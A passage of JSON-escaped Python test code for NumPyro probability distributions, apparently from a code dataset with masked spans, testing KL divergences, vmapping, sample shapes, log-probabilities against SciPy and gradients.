ids=str)\ndef test_kl_independent_normal(batch_shape, event_shape):\n shape = batch_shape + event_shape\n p = dist.Normal(np.random.normal(size=shape), np.exp(np.random.normal(\n size=shape)))\n q = dist.Normal(np.random.normal(size=shape), np.exp(np.random.normal(\n size=shape)))\n actual = kl_divergence(dist.Independent(p, len(event_shape)), dist.\n Independent(q, len(event_shape)))\n expected = sum_rightmost(kl_divergence(p, q), len(event_shape))\n assert_allclose(actual, expected)\n\n\[email protected]('batch_shape', [(), (4,), (2, 3)], ids=str)\[email protected]('event_shape', [(), (4,), (2, 3)], ids=str)\ndef test_kl_expanded_normal(batch_shape, event_shape):\n shape = batch_shape + event_shape\n p = dist.Normal(np.random.normal(), np.exp(np.random.normal())).expand(\n shape)\n q = dist.Normal(np.random.normal(), np.exp(np.random.normal())).expand(\n shape)\n actual = kl_divergence(dist.Independent(p, len(event_shape)), dist.\n Independent(q, len(event_shape)))\n expected = sum_rightmost(kl_divergence(p, q), len(event_shape))\n assert_allclose(actual, expected)\n\n\[email protected]('shape', [(), (4,), (2, 3)], ids=str)\[email protected]('p_dist, q_dist', [(dist.Beta, dist.Beta), (dist.\n Gamma, dist.Gamma), (dist.Kumaraswamy, dist.Beta), (dist.Normal, dist.\n Normal), (dist.Weibull, dist.Gamma)])\ndef test_kl_univariate(shape, p_dist, q_dist):\n\n def make_dist(dist_class):\n params = {}\n for k, c in dist_class.arg_constraints.items():\n if c is constraints.real:\n params[k] = 
np.random.normal(size=shape)\n elif c is constraints.positive:\n params[k] = np.exp(np.random.normal(size=shape))\n else:\n raise ValueError(f'Missing pattern for param {k}.')\n d = dist_class(**params)\n if dist_class is dist.Kumaraswamy:\n d.KL_KUMARASWAMY_BETA_TAYLOR_ORDER = 1000\n return d\n p = make_dist(p_dist)\n q = make_dist(q_dist)\n actual = kl_divergence(p, q)\n x = p.sample(random.PRNGKey(0), (10000,)).copy()\n expected = jnp.mean(p.log_prob(x) - q.log_prob(x), 0)\n assert_allclose(actual, expected, rtol=0.05)\n\n\[email protected]('shape', [(4,), (2, 3)], ids=str)\ndef test_kl_dirichlet_dirichlet(shape):\n p = dist.Dirichlet(np.exp(np.random.normal(size=shape)))\n q = dist.Dirichlet(np.exp(np.random.normal(size=shape)))\n actual = kl_divergence(p, q)\n x = p.sample(random.PRNGKey(0), (10000,)).copy()\n expected = jnp.mean(p.log_prob(x) - q.log_prob(x), 0)\n assert_allclose(actual, expected, rtol=0.05)\n\n\ndef test_vmapped_binomial_p0():\n\n def sample_binomial_withp0(key):\n n = 2 * (random.uniform(key) > 0.5)\n _, key = random.split(key)\n return dist.Binomial(total_count=n, probs=0).sample(key)\n jax.vmap(sample_binomial_withp0)(random.split(random.PRNGKey(0), 1))\n\n\n<mask token>\n\n\ndef _allclose_or_equal(a1, a2):\n if isinstance(a1, np.ndarray):\n return np.allclose(a2, a1)\n elif isinstance(a1, jnp.ndarray):\n return jnp.allclose(a2, a1)\n elif isinstance(a1, csr_matrix):\n return np.allclose(a2.todense(), a1.todense())\n else:\n return a2 == a1 or a2 is a1\n\n\ndef _tree_equal(t1, t2):\n t = jax.tree_util.tree_map(_allclose_or_equal, t1, t2)\n return jnp.all(jax.flatten_util.ravel_pytree(t)[0])\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\ndef test_vmap_dist(jax_dist, sp_dist, params):\n param_names = list(inspect.signature(jax_dist).parameters.keys())\n vmappable_param_idxs = _get_vmappable_dist_init_params(jax_dist)\n vmappable_param_idxs = vmappable_param_idxs[:len(params)]\n if len(vmappable_param_idxs) == 0:\n return\n\n def make_jax_dist(*params):\n return jax_dist(*params)\n\n def sample(d: dist.Distribution):\n return d.sample(random.PRNGKey(0))\n d = make_jax_dist(*params)\n if isinstance(d, _SparseCAR) and d.is_sparse:\n return\n in_out_axes_cases = [(tuple(0 if i in vmappable_param_idxs else None for\n i in range(len(params))), 0), *(([(0 if i == idx else None) for i in\n range(len(params))], 0) for idx in vmappable_param_idxs if params[\n idx] is not None), *(([(0 if i == idx else None) for i in range(len\n (params))], vmap_over(d, **{param_names[idx]: 0})) for idx in\n vmappable_param_idxs if params[idx] is not None), *(([(1 if i ==\n idx else None) for i in range(len(params))], vmap_over(d, **{\n param_names[idx]: 1})) for idx in vmappable_param_idxs if \n isinstance(params[idx], jnp.ndarray) and jnp.array(params[idx]).\n ndim > 0 and jax_dist is not _GeneralMixture)]\n for in_axes, out_axes in in_out_axes_cases:\n batched_params = [(jax.tree_map(lambda x: jnp.expand_dims(x, ax),\n arg) if isinstance(ax, int) else arg) for arg, ax in zip(params,\n in_axes)]\n d = make_jax_dist(*params)\n batched_d = jax.vmap(make_jax_dist, in_axes=in_axes, out_axes=out_axes\n )(*batched_params)\n eq = vmap(lambda x, y: _tree_equal(x, y), in_axes=(out_axes, None))(\n batched_d, d)\n assert eq == jnp.array([True])\n samples_dist = sample(d)\n samples_batched_dist = jax.vmap(sample, in_axes=(out_axes,))(batched_d)\n assert samples_batched_dist.shape == (1, *samples_dist.shape)\n\n\ndef test_multinomial_abstract_total_count():\n 
probs = jnp.array([0.2, 0.5, 0.3])\n key = random.PRNGKey(0)\n\n def f(x):\n total_count = x.sum(-1)\n return dist.Multinomial(total_count, probs=probs, total_count_max=10\n ).sample(key)\n x = dist.Multinomial(10, probs).sample(key)\n y = jax.jit(f)(x)\n assert_allclose(x, y, rtol=1e-06)\n\n\ndef test_normal_log_cdf():\n loc = jnp.array([[0.0, -10.0, 20.0]])\n scale = jnp.array([[1, 5, 7]])\n values = jnp.linspace(-5, 5, 100).reshape(-1, 1)\n numpyro_log_cdf = dist.Normal(loc=loc, scale=scale).log_cdf(values)\n numpyro_cdf = dist.Normal(loc=loc, scale=scale).cdf(values)\n jax_log_cdf = jax_norm.logcdf(loc=loc, scale=scale, x=values)\n assert_allclose(numpyro_log_cdf, jax_log_cdf)\n assert_allclose(jnp.exp(numpyro_log_cdf), numpyro_cdf, rtol=1e-06)\n\n\[email protected]('value', [-15.0, jnp.array([[-15.0], [-10.0], [-\n 5.0]]), jnp.array([[[-15.0], [-10.0], [-5.0]], [[-14.0], [-9.0], [-4.0]]])]\n )\ndef test_truncated_normal_log_prob_in_tail(value):\n loc = 1.35\n scale = jnp.geomspace(0.01, 1, 10)\n low, high = -20, -1.0\n a, b = (low - loc) / scale, (high - loc) / scale\n numpyro_log_prob = dist.TruncatedNormal(loc, scale, low=low, high=high\n ).log_prob(value)\n jax_log_prob = jax_truncnorm.logpdf(value, loc=loc, scale=scale, a=a, b=b)\n assert_allclose(numpyro_log_prob, jax_log_prob, rtol=1e-06)\n\n\ndef test_sample_truncated_normal_in_tail():\n tail_dist = dist.TruncatedNormal(loc=0, scale=1, low=-16, high=-15)\n samples = tail_dist.sample(random.PRNGKey(0), sample_shape=(10000,))\n assert ~jnp.isinf(samples).any()\n\n\[email protected]_custom_prng()\ndef test_jax_custom_prng():\n samples = dist.Normal(0, 5).sample(random.PRNGKey(0), sample_shape=(1000,))\n assert ~jnp.isinf(samples).any()\n",
"step-4": "<mask token>\n\n\ndef my_kron(A, B):\n D = A[..., :, None, :, None] * B[..., None, :, None, :]\n ds = D.shape\n newshape = *ds[:-4], ds[-4] * ds[-3], ds[-2] * ds[-1]\n return D.reshape(newshape)\n\n\ndef _identity(x):\n return x\n\n\ndef _circ_mean(angles):\n return jnp.arctan2(jnp.mean(jnp.sin(angles), axis=0), jnp.mean(jnp.cos(\n angles), axis=0))\n\n\ndef sde_fn1(x, _):\n lam = 0.1\n sigma2 = 0.1\n return lam * x, sigma2\n\n\n<mask token>\n\n\nclass T(namedtuple('TestCase', ['jax_dist', 'sp_dist', 'params'])):\n\n def __new__(cls, jax_dist, *params):\n sp_dist = get_sp_dist(jax_dist)\n return super(cls, T).__new__(cls, jax_dist, sp_dist, params)\n\n\ndef _mvn_to_scipy(loc, cov, prec, tril):\n jax_dist = dist.MultivariateNormal(loc, cov, prec, tril)\n mean = jax_dist.mean\n cov = jax_dist.covariance_matrix\n return osp.multivariate_normal(mean=mean, cov=cov)\n\n\ndef _multivariate_t_to_scipy(df, loc, tril):\n if scipy.__version__ < '1.6.0':\n pytest.skip(\n 'Multivariate Student-T distribution is not available in scipy < 1.6'\n )\n jax_dist = dist.MultivariateStudentT(df, loc, tril)\n mean = jax_dist.mean\n cov = jax_dist.covariance_matrix\n return osp.multivariate_t(loc=mean, shape=cov, df=df)\n\n\ndef _lowrank_mvn_to_scipy(loc, cov_fac, cov_diag):\n jax_dist = dist.LowRankMultivariateNormal(loc, cov_fac, cov_diag)\n mean = jax_dist.mean\n cov = jax_dist.covariance_matrix\n return osp.multivariate_normal(mean=mean, cov=cov)\n\n\n<mask token>\n\n\ndef _TruncatedNormal(loc, scale, low, high):\n return dist.TruncatedNormal(loc=loc, scale=scale, low=low, high=high)\n\n\ndef _TruncatedCauchy(loc, scale, low, high):\n return dist.TruncatedCauchy(loc=loc, scale=scale, low=low, high=high)\n\n\n<mask token>\n\n\nclass SineSkewedUniform(dist.SineSkewed):\n\n def __init__(self, skewness, **kwargs):\n lower, upper = np.array([-math.pi, -math.pi]), np.array([math.pi,\n math.pi])\n base_dist = dist.Uniform(lower, upper, **kwargs).to_event(lower.ndim)\n super().__init__(base_dist, skewness, **kwargs)\n\n\n@vmap_over.register\ndef _vmap_over_sine_skewed_uniform(self: SineSkewedUniform, skewness=None):\n return vmap_over.dispatch(dist.SineSkewed)(self, base_dist=None,\n skewness=skewness)\n\n\nclass SineSkewedVonMises(dist.SineSkewed):\n\n def __init__(self, skewness, **kwargs):\n von_loc, von_conc = np.array([0.0]), np.array([1.0])\n base_dist = dist.VonMises(von_loc, von_conc, **kwargs).to_event(von_loc\n .ndim)\n super().__init__(base_dist, skewness, **kwargs)\n\n\n<mask token>\n\n\nclass SineSkewedVonMisesBatched(dist.SineSkewed):\n\n def __init__(self, skewness, **kwargs):\n von_loc, von_conc = np.array([0.0, -1.234]), np.array([1.0, 10.0])\n base_dist = dist.VonMises(von_loc, von_conc, **kwargs).to_event(von_loc\n .ndim)\n super().__init__(base_dist, skewness, **kwargs)\n\n\n@vmap_over.register\ndef _vmap_over_sine_skewed_von_mises_batched(self:\n SineSkewedVonMisesBatched, skewness=None):\n return vmap_over.dispatch(dist.SineSkewed)(self, base_dist=None,\n skewness=skewness)\n\n\nclass _GaussianMixture(dist.MixtureSameFamily):\n arg_constraints = {}\n reparametrized_params = []\n\n def __init__(self, mixing_probs, loc, scale):\n component_dist = dist.Normal(loc=loc, scale=scale)\n mixing_distribution = dist.Categorical(probs=mixing_probs)\n super().__init__(mixing_distribution=mixing_distribution,\n component_distribution=component_dist)\n\n @property\n def loc(self):\n return self.component_distribution.loc\n\n @property\n def scale(self):\n return 
self.component_distribution.scale\n\n\n@vmap_over.register\ndef _vmap_over_gaussian_mixture(self: _GaussianMixture, loc=None, scale=None):\n component_distribution = vmap_over(self.component_distribution, loc=loc,\n scale=scale)\n return vmap_over.dispatch(dist.MixtureSameFamily)(self,\n _component_distribution=component_distribution)\n\n\nclass _Gaussian2DMixture(dist.MixtureSameFamily):\n arg_constraints = {}\n reparametrized_params = []\n\n def __init__(self, mixing_probs, loc, covariance_matrix):\n component_dist = dist.MultivariateNormal(loc=loc, covariance_matrix\n =covariance_matrix)\n mixing_distribution = dist.Categorical(probs=mixing_probs)\n super().__init__(mixing_distribution=mixing_distribution,\n component_distribution=component_dist)\n\n @property\n def loc(self):\n return self.component_distribution.loc\n\n @property\n def covariance_matrix(self):\n return self.component_distribution.covariance_matrix\n\n\n@vmap_over.register\ndef _vmap_over_gaussian_2d_mixture(self: _Gaussian2DMixture, loc=None):\n component_distribution = vmap_over(self.component_distribution, loc=loc)\n return vmap_over.dispatch(dist.MixtureSameFamily)(self,\n _component_distribution=component_distribution)\n\n\nclass _GeneralMixture(dist.MixtureGeneral):\n arg_constraints = {}\n reparametrized_params = []\n\n def __init__(self, mixing_probs, locs, scales):\n component_dists = [dist.Normal(loc=loc_, scale=scale_) for loc_,\n scale_ in zip(locs, scales)]\n mixing_distribution = dist.Categorical(probs=mixing_probs)\n return super().__init__(mixing_distribution=mixing_distribution,\n component_distributions=component_dists)\n\n @property\n def locs(self):\n return self.component_distributions[0].loc\n\n @property\n def scales(self):\n return self.component_distributions[0].scale\n\n\n@vmap_over.register\ndef _vmap_over_general_mixture(self: _GeneralMixture, locs=None, scales=None):\n component_distributions = [vmap_over(d, loc=locs, scale=scales) for d in\n self.component_distributions]\n return vmap_over.dispatch(dist.MixtureGeneral)(self,\n _component_distributions=component_distributions)\n\n\nclass _General2DMixture(dist.MixtureGeneral):\n arg_constraints = {}\n reparametrized_params = []\n\n def __init__(self, mixing_probs, locs, covariance_matrices):\n component_dists = [dist.MultivariateNormal(loc=loc_,\n covariance_matrix=covariance_matrix) for loc_,\n covariance_matrix in zip(locs, covariance_matrices)]\n mixing_distribution = dist.Categorical(probs=mixing_probs)\n return super().__init__(mixing_distribution=mixing_distribution,\n component_distributions=component_dists)\n\n @property\n def locs(self):\n return self.component_distributions[0].loc\n\n @property\n def covariance_matrices(self):\n return self.component_distributions[0].covariance_matrix\n\n\n@vmap_over.register\ndef _vmap_over_general_2d_mixture(self: _General2DMixture, locs=None):\n component_distributions = [vmap_over(d, loc=locs) for d in self.\n component_distributions]\n return vmap_over.dispatch(dist.MixtureGeneral)(self,\n _component_distributions=component_distributions)\n\n\nclass _ImproperWrapper(dist.ImproperUniform):\n\n def sample(self, key, sample_shape=()):\n transform = biject_to(self.support)\n prototype_value = jnp.zeros(self.event_shape)\n unconstrained_event_shape = jnp.shape(transform.inv(prototype_value))\n shape = sample_shape + self.batch_shape + unconstrained_event_shape\n unconstrained_samples = random.uniform(key, shape, minval=-2, maxval=2)\n return transform(unconstrained_samples)\n\n\nclass 
ZeroInflatedPoissonLogits(dist.discrete.ZeroInflatedLogits):\n arg_constraints = {'rate': constraints.positive, 'gate_logits':\n constraints.real}\n pytree_data_fields = 'rate',\n\n def __init__(self, rate, gate_logits, *, validate_args=None):\n self.rate = rate\n super().__init__(dist.Poisson(rate), gate_logits, validate_args=\n validate_args)\n\n\n@vmap_over.register\ndef _vmap_over_zero_inflated_poisson_logits(self: ZeroInflatedPoissonLogits,\n rate=None, gate_logits=None):\n dist_axes = vmap_over.dispatch(dist.discrete.ZeroInflatedLogits)(self,\n base_dist=vmap_over(self.base_dist, rate=rate), gate_logits=\n gate_logits, gate=gate_logits)\n dist_axes.rate = rate\n return dist_axes\n\n\nclass SparsePoisson(dist.Poisson):\n\n def __init__(self, rate, *, validate_args=None):\n super().__init__(rate, is_sparse=True, validate_args=validate_args)\n\n\nclass FoldedNormal(dist.FoldedDistribution):\n arg_constraints = {'loc': constraints.real, 'scale': constraints.positive}\n\n def __init__(self, loc, scale, validate_args=None):\n self.loc = loc\n self.scale = scale\n super().__init__(dist.Normal(loc, scale), validate_args=validate_args)\n\n\n@vmap_over.register\ndef _vmap_over_folded_normal(self: 'FoldedNormal', loc=None, scale=None):\n d = vmap_over.dispatch(dist.FoldedDistribution)(self, base_dist=\n vmap_over(self.base_dist, loc=loc, scale=scale))\n d.loc = loc\n d.scale = scale\n return d\n\n\nclass _SparseCAR(dist.CAR):\n reparametrized_params = ['loc', 'correlation', 'conditional_precision']\n\n def __init__(self, loc, correlation, conditional_precision, adj_matrix,\n *, is_sparse=True, validate_args=None):\n super().__init__(loc, correlation, conditional_precision,\n adj_matrix, is_sparse=True, validate_args=validate_args)\n\n\n<mask token>\n\n\ndef get_sp_dist(jax_dist):\n classes = jax_dist.mro() if isinstance(jax_dist, type) else [jax_dist]\n for cls in classes:\n if cls in _DIST_MAP:\n return _DIST_MAP[cls]\n\n\n<mask token>\n\n\ndef _is_batched_multivariate(jax_dist):\n return len(jax_dist.event_shape) > 0 and len(jax_dist.batch_shape) > 0\n\n\ndef gen_values_within_bounds(constraint, size, key=random.PRNGKey(11)):\n eps = 1e-06\n if constraint is constraints.boolean:\n return random.bernoulli(key, shape=size)\n elif isinstance(constraint, constraints.greater_than):\n return jnp.exp(random.normal(key, size)) + constraint.lower_bound + eps\n elif isinstance(constraint, constraints.integer_interval):\n lower_bound = jnp.broadcast_to(constraint.lower_bound, size)\n upper_bound = jnp.broadcast_to(constraint.upper_bound, size)\n return random.randint(key, size, lower_bound, upper_bound + 1)\n elif isinstance(constraint, constraints.integer_greater_than):\n return constraint.lower_bound + random.poisson(key, np.array(5),\n shape=size)\n elif isinstance(constraint, constraints.interval):\n lower_bound = jnp.broadcast_to(constraint.lower_bound, size)\n upper_bound = jnp.broadcast_to(constraint.upper_bound, size)\n return random.uniform(key, size, minval=lower_bound, maxval=upper_bound\n )\n elif constraint in (constraints.real, constraints.real_vector):\n return random.normal(key, size)\n elif constraint is constraints.simplex:\n return osp.dirichlet.rvs(alpha=jnp.ones((size[-1],)), size=size[:-1])\n elif isinstance(constraint, constraints.multinomial):\n n = size[-1]\n return multinomial(key, p=jnp.ones((n,)) / n, n=constraint.\n upper_bound, shape=size[:-1])\n elif constraint is constraints.corr_cholesky:\n return signed_stick_breaking_tril(random.uniform(key, size[:-2] + (\n size[-1] * 
(size[-1] - 1) // 2,), minval=-1, maxval=1))\n elif constraint is constraints.corr_matrix:\n cholesky = signed_stick_breaking_tril(random.uniform(key, size[:-2] +\n (size[-1] * (size[-1] - 1) // 2,), minval=-1, maxval=1))\n return jnp.matmul(cholesky, jnp.swapaxes(cholesky, -2, -1))\n elif constraint is constraints.lower_cholesky:\n return jnp.tril(random.uniform(key, size))\n elif constraint is constraints.positive_definite:\n x = random.normal(key, size)\n return jnp.matmul(x, jnp.swapaxes(x, -2, -1))\n elif constraint is constraints.ordered_vector:\n x = jnp.cumsum(random.exponential(key, size), -1)\n return x - random.normal(key, size[:-1] + (1,))\n elif isinstance(constraint, constraints.independent):\n return gen_values_within_bounds(constraint.base_constraint, size, key)\n elif constraint is constraints.sphere:\n x = random.normal(key, size)\n return x / jnp.linalg.norm(x, axis=-1)\n elif constraint is constraints.l1_ball:\n key1, key2 = random.split(key)\n sign = random.bernoulli(key1)\n bounds = [0, (-1) ** sign * 0.5]\n return random.uniform(key, size, float, *sorted(bounds))\n else:\n raise NotImplementedError('{} not implemented.'.format(constraint))\n\n\ndef gen_values_outside_bounds(constraint, size, key=random.PRNGKey(11)):\n if constraint is constraints.boolean:\n return random.bernoulli(key, shape=size) - 2\n elif isinstance(constraint, constraints.greater_than):\n return constraint.lower_bound - jnp.exp(random.normal(key, size))\n elif isinstance(constraint, constraints.integer_interval):\n lower_bound = jnp.broadcast_to(constraint.lower_bound, size)\n return random.randint(key, size, lower_bound - 1, lower_bound)\n elif isinstance(constraint, constraints.integer_greater_than):\n return constraint.lower_bound - random.poisson(key, np.array(5),\n shape=size)\n elif isinstance(constraint, constraints.interval):\n upper_bound = jnp.broadcast_to(constraint.upper_bound, size)\n return random.uniform(key, size, minval=upper_bound, maxval=\n upper_bound + 1.0)\n elif constraint in [constraints.real, constraints.real_vector]:\n return lax.full(size, np.nan)\n elif constraint is constraints.simplex:\n return osp.dirichlet.rvs(alpha=jnp.ones((size[-1],)), size=size[:-1]\n ) + 0.01\n elif isinstance(constraint, constraints.multinomial):\n n = size[-1]\n return multinomial(key, p=jnp.ones((n,)) / n, n=constraint.\n upper_bound, shape=size[:-1]) + 1\n elif constraint is constraints.corr_cholesky:\n return signed_stick_breaking_tril(random.uniform(key, size[:-2] + (\n size[-1] * (size[-1] - 1) // 2,), minval=-1, maxval=1)) + 0.01\n elif constraint is constraints.corr_matrix:\n cholesky = 0.01 + signed_stick_breaking_tril(random.uniform(key, \n size[:-2] + (size[-1] * (size[-1] - 1) // 2,), minval=-1, maxval=1)\n )\n return jnp.matmul(cholesky, jnp.swapaxes(cholesky, -2, -1))\n elif constraint is constraints.lower_cholesky:\n return random.uniform(key, size)\n elif constraint is constraints.positive_definite:\n return random.normal(key, size)\n elif constraint is constraints.ordered_vector:\n x = jnp.cumsum(random.exponential(key, size), -1)\n return x[..., ::-1]\n elif isinstance(constraint, constraints.independent):\n return gen_values_outside_bounds(constraint.base_constraint, size, key)\n elif constraint is constraints.sphere:\n x = random.normal(key, size)\n x = x / jnp.linalg.norm(x, axis=-1, keepdims=True)\n return 2 * x\n elif constraint is constraints.l1_ball:\n key1, key2 = random.split(key)\n sign = random.bernoulli(key1)\n bounds = [(-1) ** sign * 1.1, (-1) ** sign * 2]\n 
return random.uniform(key, size, float, *sorted(bounds))\n else:\n raise NotImplementedError('{} not implemented.'.format(constraint))\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\[email protected]('prepend_shape', [(), (2,), (2, 3)])\ndef test_dist_shape(jax_dist, sp_dist, params, prepend_shape):\n jax_dist = jax_dist(*params)\n rng_key = random.PRNGKey(0)\n expected_shape = (prepend_shape + jax_dist.batch_shape + jax_dist.\n event_shape)\n samples = jax_dist.sample(key=rng_key, sample_shape=prepend_shape)\n assert isinstance(samples, jnp.ndarray)\n assert jnp.shape(samples) == expected_shape\n if sp_dist and not _is_batched_multivariate(jax_dist) and not isinstance(\n jax_dist, dist.MultivariateStudentT):\n sp_dist = sp_dist(*params)\n sp_samples = sp_dist.rvs(size=prepend_shape + jax_dist.batch_shape)\n assert jnp.shape(sp_samples) == expected_shape\n elif sp_dist and not _is_batched_multivariate(jax_dist) and isinstance(\n jax_dist, dist.MultivariateStudentT):\n sp_dist = sp_dist(*params)\n size_ = prepend_shape + jax_dist.batch_shape\n size = 1 if size_ == () else size_\n try:\n sp_samples = sp_dist.rvs(size=size)\n except ValueError:\n pytest.skip(\n \"scipy multivariate t doesn't support size with > 1 element\")\n assert jnp.shape(sp_samples) == expected_shape\n if isinstance(jax_dist, (dist.MultivariateNormal, dist.\n MultivariateStudentT)):\n assert jax_dist.covariance_matrix.ndim == len(jax_dist.batch_shape) + 2\n assert_allclose(jax_dist.precision_matrix, jnp.linalg.inv(jax_dist.\n covariance_matrix), rtol=1e-06)\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\ndef test_infer_shapes(jax_dist, sp_dist, params):\n shapes = tuple(getattr(p, 'shape', ()) for p in params)\n shapes = tuple(x() if callable(x) else x for x in shapes)\n jax_dist = jax_dist(*params)\n try:\n expected_batch_shape, expected_event_shape = type(jax_dist\n ).infer_shapes(*shapes)\n except NotImplementedError:\n pytest.skip(\n f'{type(jax_dist).__name__}.infer_shapes() is not implemented')\n assert jax_dist.batch_shape == expected_batch_shape\n assert jax_dist.event_shape == expected_event_shape\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\ndef test_has_rsample(jax_dist, sp_dist, params):\n jax_dist = jax_dist(*params)\n masked_dist = jax_dist.mask(False)\n indept_dist = jax_dist.expand_by([2]).to_event(1)\n transf_dist = dist.TransformedDistribution(jax_dist, biject_to(\n constraints.real))\n assert masked_dist.has_rsample == jax_dist.has_rsample\n assert indept_dist.has_rsample == jax_dist.has_rsample\n assert transf_dist.has_rsample == jax_dist.has_rsample\n if jax_dist.has_rsample:\n assert isinstance(jax_dist, dist.Delta) or not jax_dist.is_discrete\n if isinstance(jax_dist, dist.TransformedDistribution):\n assert jax_dist.base_dist.has_rsample\n else:\n assert set(jax_dist.arg_constraints) == set(jax_dist.\n reparametrized_params)\n jax_dist.rsample(random.PRNGKey(0))\n if isinstance(jax_dist, dist.Normal):\n masked_dist.rsample(random.PRNGKey(0))\n indept_dist.rsample(random.PRNGKey(0))\n transf_dist.rsample(random.PRNGKey(0))\n else:\n with pytest.raises(NotImplementedError):\n jax_dist.rsample(random.PRNGKey(0))\n if isinstance(jax_dist, dist.BernoulliProbs):\n with pytest.raises(NotImplementedError):\n masked_dist.rsample(random.PRNGKey(0))\n with pytest.raises(NotImplementedError):\n indept_dist.rsample(random.PRNGKey(0))\n with pytest.raises(NotImplementedError):\n 
transf_dist.rsample(random.PRNGKey(0))\n\n\[email protected]('batch_shape', [(), (4,), (3, 2)])\ndef test_unit(batch_shape):\n log_factor = random.normal(random.PRNGKey(0), batch_shape)\n d = dist.Unit(log_factor=log_factor)\n x = d.sample(random.PRNGKey(1))\n assert x.shape == batch_shape + (0,)\n assert (d.log_prob(x) == log_factor).all()\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS)\ndef test_sample_gradient(jax_dist, sp_dist, params):\n gamma_derived_params = {'Gamma': ['concentration'], 'Beta': [\n 'concentration1', 'concentration0'], 'BetaProportion': ['mean',\n 'concentration'], 'Chi2': ['df'], 'Dirichlet': ['concentration'],\n 'InverseGamma': ['concentration'], 'LKJ': ['concentration'],\n 'LKJCholesky': ['concentration'], 'StudentT': ['df']}.get(jax_dist.\n __name__, [])\n dist_args = [p for p in (inspect.getfullargspec(jax_dist.__init__)[0][1\n :] if inspect.isclass(jax_dist) else inspect.getfullargspec(\n jax_dist)[0])]\n params_dict = dict(zip(dist_args[:len(params)], params))\n jax_class = type(jax_dist(**params_dict))\n reparametrized_params = [p for p in jax_class.reparametrized_params if \n p not in gamma_derived_params]\n if not reparametrized_params:\n pytest.skip('{} not reparametrized.'.format(jax_class.__name__))\n nonrepara_params_dict = {k: v for k, v in params_dict.items() if k not in\n reparametrized_params}\n repara_params = tuple(v for k, v in params_dict.items() if k in\n reparametrized_params)\n rng_key = random.PRNGKey(0)\n\n def fn(args):\n args_dict = dict(zip(reparametrized_params, args))\n return jnp.sum(jax_dist(**args_dict, **nonrepara_params_dict).\n sample(key=rng_key))\n actual_grad = jax.grad(fn)(repara_params)\n assert len(actual_grad) == len(repara_params)\n eps = 0.001\n for i in range(len(repara_params)):\n if repara_params[i] is None:\n continue\n args_lhs = [(p if j != i else p - eps) for j, p in enumerate(\n repara_params)]\n args_rhs = [(p if j != i else p + eps) for j, p in enumerate(\n repara_params)]\n fn_lhs = fn(args_lhs)\n fn_rhs = fn(args_rhs)\n expected_grad = (fn_rhs - fn_lhs) / (2.0 * eps)\n assert jnp.shape(actual_grad[i]) == jnp.shape(repara_params[i])\n assert_allclose(jnp.sum(actual_grad[i]), expected_grad, rtol=0.02,\n atol=0.03)\n\n\[email protected]('jax_dist, params', [(dist.Gamma, (1.0,)), (dist.\n Gamma, (0.1,)), (dist.Gamma, (10.0,)), (dist.Chi2, (1.0,)), (dist.Chi2,\n (0.1,)), (dist.Chi2, (10.0,)), (dist.Beta, (1.0, 1.0)), (dist.StudentT,\n (5.0, 2.0, 4.0))])\ndef test_pathwise_gradient(jax_dist, params):\n rng_key = random.PRNGKey(0)\n N = 1000000\n\n def f(params):\n z = jax_dist(*params).sample(key=rng_key, sample_shape=(N,))\n return (z + z ** 2).mean(0)\n\n def g(params):\n d = jax_dist(*params)\n return d.mean + d.variance + d.mean ** 2\n actual_grad = grad(f)(params)\n expected_grad = grad(g)(params)\n assert_allclose(actual_grad, expected_grad, rtol=0.005)\n\n\n<mask token>\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\[email protected]('prepend_shape', [(), (2,), (2, 3)])\[email protected]('jit', [False, True])\ndef test_log_prob(jax_dist, sp_dist, params, prepend_shape, jit):\n jit_fn = _identity if not jit else jax.jit\n jax_dist = jax_dist(*params)\n rng_key = random.PRNGKey(0)\n samples = jax_dist.sample(key=rng_key, sample_shape=prepend_shape)\n assert jax_dist.log_prob(samples\n ).shape == prepend_shape + jax_dist.batch_shape\n truncated_dists = (dist.LeftTruncatedDistribution, dist.\n RightTruncatedDistribution, 
dist.TwoSidedTruncatedDistribution)\n if sp_dist is None:\n if isinstance(jax_dist, truncated_dists):\n if isinstance(params[0], dist.Distribution):\n loc, scale, low, high = params[0].loc, params[0].scale, params[\n 1], params[2]\n else:\n loc, scale, low, high = params\n if low is None:\n low = -np.inf\n if high is None:\n high = np.inf\n sp_dist = get_sp_dist(type(jax_dist.base_dist))(loc, scale)\n expected = sp_dist.logpdf(samples) - jnp.log(sp_dist.cdf(high) -\n sp_dist.cdf(low))\n assert_allclose(jit_fn(jax_dist.log_prob)(samples), expected,\n atol=1e-05)\n return\n pytest.skip('no corresponding scipy distn.')\n if _is_batched_multivariate(jax_dist):\n pytest.skip('batching not allowed in multivariate distns.')\n if jax_dist.event_shape and prepend_shape:\n pytest.skip(\n 'batched samples cannot be scored by multivariate distributions.')\n sp_dist = sp_dist(*params)\n try:\n expected = sp_dist.logpdf(samples)\n except AttributeError:\n expected = sp_dist.logpmf(samples)\n except ValueError as e:\n if \"The input vector 'x' must lie within the normal simplex.\" in str(e\n ):\n samples = jax.device_get(samples).astype('float64')\n samples = samples / samples.sum(axis=-1, keepdims=True)\n expected = sp_dist.logpdf(samples)\n else:\n raise e\n assert_allclose(jit_fn(jax_dist.log_prob)(samples), expected, atol=1e-05)\n\n\ndef test_mixture_log_prob():\n gmm = dist.MixtureSameFamily(dist.Categorical(logits=np.zeros(2)), dist\n .Normal(0, 1).expand([2]))\n actual = gmm.log_prob(0.0)\n expected = dist.Normal(0, 1).log_prob(0.0)\n assert_allclose(actual, expected)\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + [T(dist.\n Poisson, 2.0), T(dist.Poisson, np.array([2.0, 3.0, 5.0]))])\[email protected]('ignore:overflow encountered:RuntimeWarning')\ndef test_cdf_and_icdf(jax_dist, sp_dist, params):\n d = jax_dist(*params)\n if d.event_dim > 0:\n pytest.skip(\n 'skip testing cdf/icdf methods of multivariate distributions')\n samples = d.sample(key=random.PRNGKey(0), sample_shape=(100,))\n quantiles = random.uniform(random.PRNGKey(1), (100,) + d.shape())\n try:\n rtol = 0.002 if jax_dist in (dist.Gamma, 